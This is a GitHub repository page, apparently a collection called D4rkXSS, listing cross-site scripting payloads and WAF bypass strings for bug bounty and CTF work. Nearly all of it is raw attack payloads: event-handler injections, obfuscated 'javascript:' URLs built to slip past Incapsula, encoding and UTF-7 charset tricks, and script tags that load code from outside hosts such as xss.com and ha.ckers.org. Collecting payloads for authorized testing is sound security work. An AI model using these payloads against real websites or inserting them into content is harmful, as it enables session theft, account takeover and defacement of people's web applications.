Skip to content
/ D4rkXSS Public

A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF

License

Notifications You must be signed in to change notification settings

R0X4R/D4rkXSS

Repository files navigation

D4rkXSS



All in one place for XSS.
R0X4R

Contribution

This is an open source repo. Anyone can contribute. 🍻
Coffee

Bypass WAF

NO SCRIPT

  • For Example:
  • <acronym><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    <bgsound><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    <xmp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    ">'><details/open/ontoggle=confirm('XSS')>
    incapsula bypass: <iframe/onload="var b ='document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;this['src']=a">

    Brutelogic

  • For Example:
  • \'-alert(1)//
    </script><svg onload=alert(1)>
    <x contenteditable onblur=alert(1)>lose focus!
    

    Fuzz3r

  • For Example:
  • #getURL,javascript:alert(1)",
    #goto,javascript:alert(1)",	
    ?javascript:alert(1)",
    
    

    IMG Error

  • Encoding
  • <img onerror="location='javascript:=lert(1)'" src="x">
    <img onerror="location='javascript:%61lert(1)'" src="x">
    <img onerror="location='javascript:\x2561lert(1)'" src="x">
    <img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
    

    Jhaddix

    Jhaddix

  • For Example:
  • '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
    <<scr\0ipt/src=https://xss.com/xss.js></script
    %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
    ' onmouseover=alert(/Black.Spook/)
    
    

    RSnake

    RSnake

  • For Example:
  • <SCRIPT>alert('XSS');</SCRIPT>
    '';!--"<XSS>=&{()}
    <SCRIPT SRC=https://ha.ckers.org/xss.js></SCRIPT>
    
    

    MarioXSS

    Mario

  • For Example:
  • <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>
    

    Search Engine XSS

    seXSS

    Misc Payloads

    Misc

    Basic Payloads

    Basic

  • For Example:
  • <script>alert('1')</script>
    "><script>alert('1')</script>
    <svg/onload=alert('1');